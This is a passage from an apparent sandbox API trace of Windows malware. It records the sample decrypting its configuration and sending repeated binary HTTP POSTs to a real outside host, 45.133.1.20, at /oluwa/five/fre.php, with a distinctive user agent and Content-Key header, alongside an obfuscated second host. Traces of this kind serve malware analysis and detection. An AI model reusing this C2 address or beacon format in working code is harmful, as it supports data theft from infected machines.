hHeap=0x6a0000) returned 1 [0297.139] GetProcessHeap () returned 0x6a0000 [0297.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0297.139] GetProcessHeap () returned 0x6a0000 [0297.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0297.140] GetProcessHeap () returned 0x6a0000 [0297.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0297.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.152] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0297.162] GetProcessHeap () returned 0x6a0000 [0297.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0297.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.164] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0297.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.165] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.204] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.204] GetProcessHeap () returned 0x6a0000 [0297.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0297.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.206] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0297.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.207] CryptDestroyKey (hKey=0x6ad020) returned 1 [0297.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.209] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0297.209] GetProcessHeap () returned 0x6a0000 [0297.209] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0297.209] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.210] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0297.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.211] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0297.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.213] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0297.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.214] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0297.214] GetProcessHeap () returned 0x6a0000 [0297.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0297.214] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0297.214] GetProcessHeap () returned 0x6a0000 [0297.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0297.215] socket (af=2, type=1, protocol=6) returned 0xb28 [0297.215] connect (s=0xb28, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0297.244] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0297.244] GetProcessHeap () returned 0x6a0000 [0297.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0297.244] GetProcessHeap () returned 0x6a0000 [0297.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0297.246] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0297.247] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0297.247] GetProcessHeap () returned 0x6a0000 [0297.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6daa08 [0297.247] GetProcessHeap () returned 0x6a0000 [0297.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0297.248] GetProcessHeap () returned 0x6a0000 [0297.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0297.248] GetProcessHeap () returned 0x6a0000 [0297.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0297.249] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0297.250] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0297.250] GetProcessHeap () returned 0x6a0000 [0297.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0297.250] GetProcessHeap () returned 0x6a0000 [0297.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0297.250] send (s=0xb28, buf=0x6bd460*, len=242, flags=0) returned 242 [0297.251] send (s=0xb28, buf=0x6bb998*, len=159, flags=0) returned 159 [0297.251] GetProcessHeap () returned 0x6a0000 [0297.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0297.251] recv (in: s=0xb28, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0297.332] GetProcessHeap () returned 0x6a0000 [0297.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0297.335] GetProcessHeap () returned 0x6a0000 [0297.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0297.335] GetProcessHeap () returned 0x6a0000 [0297.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daa08 | out: hHeap=0x6a0000) returned 1 [0297.336] GetProcessHeap () returned 0x6a0000 [0297.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0297.336] closesocket (s=0xb28) returned 0 [0297.336] GetProcessHeap () returned 0x6a0000 [0297.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0297.336] GetProcessHeap () returned 0x6a0000 [0297.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0297.337] GetProcessHeap () returned 0x6a0000 [0297.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0297.337] GetProcessHeap () returned 0x6a0000 [0297.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0297.338] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1850) returned 0xb28 [0297.339] Sleep (dwMilliseconds=0xea60) [0297.341] GetProcessHeap () returned 0x6a0000 [0297.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0297.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.343] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.349] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0297.362] GetProcessHeap () returned 0x6a0000 [0297.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0297.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.363] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0297.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.365] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.366] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.366] GetProcessHeap () returned 0x6a0000 [0297.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0297.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.371] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0297.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.372] CryptDestroyKey (hKey=0x6ad060) returned 1 [0297.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.374] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0297.374] GetProcessHeap () returned 0x6a0000 [0297.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0297.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.375] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.383] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.385] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.386] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.386] GetProcessHeap () returned 0x6a0000 [0297.386] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0297.386] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.386] GetProcessHeap () returned 0x6a0000 [0297.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0297.387] GetProcessHeap () returned 0x6a0000 [0297.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0297.387] GetProcessHeap () returned 0x6a0000 [0297.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0297.388] GetProcessHeap () returned 0x6a0000 [0297.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0297.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.389] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0297.409] GetProcessHeap () returned 0x6a0000 [0297.409] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0297.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.415] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0297.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.416] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.417] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.417] GetProcessHeap () returned 0x6a0000 [0297.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0297.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.419] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0297.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.420] CryptDestroyKey (hKey=0x6ad020) returned 1 [0297.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.422] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0297.422] GetProcessHeap () returned 0x6a0000 [0297.422] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0297.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.423] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0297.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.425] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0297.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.472] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0297.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.474] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0297.474] GetProcessHeap () returned 0x6a0000 [0297.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0297.474] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0297.474] GetProcessHeap () returned 0x6a0000 [0297.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0297.474] socket (af=2, type=1, protocol=6) returned 0xb2c [0297.474] connect (s=0xb2c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0297.500] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0297.500] GetProcessHeap () returned 0x6a0000 [0297.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0297.500] GetProcessHeap () returned 0x6a0000 [0297.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0297.531] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0297.532] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0297.532] GetProcessHeap () returned 0x6a0000 [0297.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dadc8 [0297.532] GetProcessHeap () returned 0x6a0000 [0297.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0297.541] GetProcessHeap () returned 0x6a0000 [0297.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0297.541] GetProcessHeap () returned 0x6a0000 [0297.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0297.542] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0297.544] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0297.544] GetProcessHeap () returned 0x6a0000 [0297.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0297.544] GetProcessHeap () returned 0x6a0000 [0297.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0297.544] send (s=0xb2c, buf=0x6bd460*, len=242, flags=0) returned 242 [0297.545] send (s=0xb2c, buf=0x6bb998*, len=159, flags=0) returned 159 [0297.545] GetProcessHeap () returned 0x6a0000 [0297.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0297.545] recv (in: s=0xb2c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0297.619] GetProcessHeap () returned 0x6a0000 [0297.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0297.621] GetProcessHeap () returned 0x6a0000 [0297.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0297.621] GetProcessHeap () returned 0x6a0000 [0297.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dadc8 | out: hHeap=0x6a0000) returned 1 [0297.621] GetProcessHeap () returned 0x6a0000 [0297.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0297.622] closesocket (s=0xb2c) returned 0 [0297.622] GetProcessHeap () returned 0x6a0000 [0297.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0297.622] GetProcessHeap () returned 0x6a0000 [0297.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0297.623] GetProcessHeap () returned 0x6a0000 [0297.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0297.623] GetProcessHeap () returned 0x6a0000 [0297.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0297.641] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1854) returned 0xb2c [0297.645] Sleep (dwMilliseconds=0xea60) [0297.648] GetProcessHeap () returned 0x6a0000 [0297.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0297.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.650] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0297.698] GetProcessHeap () returned 0x6a0000 [0297.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0297.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.700] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0297.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.701] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0297.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.703] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0297.703] GetProcessHeap () returned 0x6a0000 [0297.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0297.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.705] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0297.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.714] CryptDestroyKey (hKey=0x6ad020) returned 1 [0297.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.716] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0297.716] GetProcessHeap () returned 0x6a0000 [0297.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0297.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.717] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0297.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.718] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0297.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.720] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0297.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0297.729] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0297.729] GetProcessHeap () returned 0x6a0000 [0297.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0297.729] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0297.729] GetProcessHeap () returned 0x6a0000 [0297.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0297.730] GetProcessHeap () returned 0x6a0000 [0297.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0297.730] GetProcessHeap () returned 0x6a0000 [0297.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0297.731] GetProcessHeap () returned 0x6a0000 [0297.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0297.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0297.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0297.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: 